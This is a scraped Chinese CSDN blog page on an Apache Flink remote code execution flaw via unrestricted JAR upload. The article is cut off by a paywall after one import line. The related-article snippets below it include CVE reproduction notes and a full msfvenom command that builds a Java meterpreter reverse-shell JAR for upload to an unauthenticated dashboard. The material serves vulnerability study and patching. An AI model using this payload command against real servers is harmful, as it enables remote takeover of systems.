Apache Flink 远程代码执行漏洞分析与实例

最新推荐文章于 2024-01-08 22:23:41 发布
最新推荐文章于 2024-01-08 22:23:41 发布
阅读量433 收藏
点赞数
文章标签: apache flink 大数据 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ugzweb/article/details/133346111
版权
安全 专栏收录该内容
47 篇文章 2 订阅 ¥59.90 ¥99.00
订阅专栏

Apache Flink 是一个分布式流处理和批处理框架,广泛应用于大数据处理和实时分析场景。然而,如果不正确地配置和使用,Apache Flink 可能会面临远程代码执行漏洞。本文将详细介绍这种漏洞的原理,并提供一个示例来说明该漏洞的潜在风险。

远程代码执行漏洞是指攻击者能够在目标系统上执行恶意代码的安全漏洞。当攻击者能够注入并执行自己的代码时,他们可以完全控制受影响的系统,从而导致数据泄露、系统崩溃或其他恶意行为。

Apache Flink 远程代码执行漏洞主要与 Flink 提供的远程执行功能相关。在 Flink 中,可以通过上传 Jar 包来扩展应用程序的功能。然而,如果没有适当地限制和验证上传的 Jar 包,攻击者可以上传包含恶意代码的 Jar 包,并在目标系统上执行该代码。

以下是一个示例演示如何利用 Apache Flink 远程代码执行漏洞的情况:

import org.apache.flink.api.java.ExecutionEnvironment;
imp
了解本专栏 订阅专栏 解锁全文
UgzWeb
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
订阅专栏
【CVE】CVE-2020-17518 & CVE-2020-17519:Flink 任意文件上传 & 未授权访问
边扯边淡
05-09 2517
起序:漏扫完看报告的时候发现的,复现学习一下。 一、靶场环境 使用的是 github 上的 vulhub 环境。因为 Flink 中的 CVE-2020-17518 和 CVE-2020-17519 在 Flink/1.11.2 版本都存在。 vulhub:https://github.com/vulhub/vulhub 1、漏洞描述:任意文件上传 & 未授权访问 CVE 编号 名称 危害 CVE-2020-17518 任意文件上传 应用系统在文件上传功能处对用户上传.
flink漏洞合集
weixin_46626737的博客
07-02 321
1.apache flink文件上传漏洞(CVE-2020-17518)-------未复现出来。漏洞版本:Apache Flink 1.5.1 ~ 1.11.2。漏洞版本:Apache Flink 1.11.0-1.11.2。2.apache flink目录遍历(CVE-2020-17519)
Flink任意文件读写漏洞复现及排查
dayouzi的博客
08-14 272
Apache Flink是由Apache软件基金会开发的开源流处理框架,其核心是用Java和Scala编写的分布式流数据流引擎。Flink以数据并行和流水线方式执行任意流数据程序,Flink的流水线运行时系统可以执行批处理和流处理程序。此外,Flink的运行时本身也支持迭代算法的执行Apache Flink的数据流编程模型在有限和无限数据集上提供单次事件(event-at-a-time)处理。在基础层面,Flink程序由流和转换组成。
漏洞修复】修复 Apache Flink Web Dashboard 未授权访问致远程命令执行漏洞
RobinWang的博客
01-15 7619
漏洞修复】修复 Apache Flink Web Dashboard 未授权访问致远程命令执行漏洞 介绍 攻击者通过Flink Web Dashboard上传含有恶意代码的jar包进行攻击,中招会使服务器占满CPU沦为挖矿机,非常猖獗 通过反编译得到的恶意代码: package com.example; import java.io.IOException; public class Mai...
Apache Flink文件上传漏洞(CVE-2020-17518)漏洞复现分析
SmileAssassn的博客
01-08 536
Apache Flink文件上传漏洞(CVE-2020-17518)漏洞复现分析
Apache Flink 未授权远程代码执行检查
weixin_42299610的博客
06-07 1735
Apache Flink 未授权远程代码执行检查
Apache Flink 未授权访问+远程代码执行.pdf
最新发布
04-30
Apache Flink 未授权访问+远程代码执行.pdf,该漏洞可以上传任意Jar包导致远程代码执行
xiejingjing1#PeiQi-WIKI-POC#Apache Flink 小于1.9.1远程代码执行 CVE-2020-
07-25
漏洞描述近日,有安全研究员公开了一个Apache Flink的任意Jar包上传导致远程代码执行漏洞.漏洞影响国内还是很多使用 Apache Flink 的,大
Apache Flink 多个漏洞分析 .pdf
09-05
以下是针对描述中提到的Apache Flink多个漏洞的详细分析: 1. 任意读取漏洞: 这个问题存在于`RouterHandler#channelRead0`方法中,路径`/`被用于分割tokens,但tokens在被创建时进行了两次URL解码。这可能导致...
大数据-玩转数据-Flink恶意登录监控
s_unbo的博客
09-17 430
因此我们考虑,应该对用户的登录失败动作进行统计,具体来说,如果同一用户(可以是不同IP)在2秒之内连续两次登录失败,就认为存在恶意登录的风险,输出相关的信息进行报警提示。这是电商网站、也是几乎所有网站风控的基本一环。对于网站而言,用户登录并不是频繁的业务操作。如果一个用户短时间内频繁登录失败,就有可能是出现了程序的恶意攻击,比如密码暴力破解。
Apache Flink未授权访问-远程代码命令执行-复现
thelostworld
10-24 577
​好久没更新了,今天趁1024更新一篇,最近工作中遇到这个漏洞,今天自己来做一下这个漏洞复现。Apache Flink未授权访问-远程代码命令执行-复现一、漏洞简介Apache Flink Dashboard默认没有用户权限认证。攻击者可以通过未授权的Flink Dashboard控制台,直接上传木马jar包,可远程执行任意系统命令获取服务器权限,风险极大。二、影响版本Apache Flink &...
Apache Flink任意Jar包上传导致远程代码执行漏洞复现
Heytoo的博客
06-19 668
0x00 简介 Apache Flink是由Apache软件基金会开发的开源流处理框架,其核心是用Java和Scala编写的分布式流数据流引擎。Flink以数据并行和流水线方式执行任意流数据程序,Flink的流水线运行时系统可以执行批处理和流处理程序。 0x01 Flink应用场景 优化电子商务的实时搜索结果:阿里巴巴的所有基础设施团队使用flink实时更新产品细节和库存信息,为用户提供更高的关联性。 针对数据分析团队提供实时流处理服务:flink通过flink-powered数据分析平台提供实时数
漏洞复现】Apache Flink任意Jar包上传导致远程代码执行
热门推荐
Summer's blog
05-13 1万+
记一次Apache Flink任意Jar包上传导致远程代码执行复现漏洞过程。 致力于小白都能看懂的漏洞复现过程!
[漏洞复现]Apache Flink未授权访问+远程代码命令执行
cj_Hydra's Blog
10-24 2568
前言: 近日,有安全研究员公开了一个Apache Flink的任意Jar包上传导致远程代码执行漏洞,影响范围:<= 1.9.1(最新版本) 但是作者通过测试在版本Version: 1.11.2也是受影响的,此次复现就是通过版本Version: 1.11.2进行复现利用。 漏洞复现: 首先通过msfveon生成jar包,命令: msfvenom -p java/meterpreter/reverse_tcp LHOST=公网IP地址 LPORT=监听端口 -f jar > rce.jar 然
未授权访问漏洞合集
m0_49420271的博客
07-24 948
未授权访问漏洞可以理解为需要安全配置或权限认证的地址、授权页面存在缺陷导致其他用户可以直接访问从而引发重要权限可被操作、数据库或网站目录等敏感信息泄露。
Apache Flink 小于1.9.1远程代码执行
weixin_63124284的博客
08-04 182
近日,有安全研究员公开了一个Apache Flink的任意Jar包上传导致远程代码执行漏洞.
Apache Flink RCE漏洞复现(任意 Jar 包上传)
Li-D的博客
08-31 2991
漏洞描述 Apache Flink Dashboard 默认无需认证即可访问,攻击者可直接在Apache Flink Dashboard页面中上传任意jar包,从而达到远程代码执行的目的。 影响版本 Apache Flink <= 1.9.1 环境搭建 操作系统: Windows10 操作环境: Apache flink 漏洞版本: Apache flink 1.9.1 搭建过程: (1)下载flink (https://archive.apache.org/dist/flink/flink-1.9.
apache flink文件上传漏洞修复
05-20
Apache Flink是一个分布式流处理框架,从版本1.0.0到1.4.0存在文件上传漏洞,攻击者可以通过该漏洞上传恶意文件并在服务器上执行任意代码,造成严重的安全风险。以下是修复该漏洞的步骤: 1.升级Apache Flink版本至...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值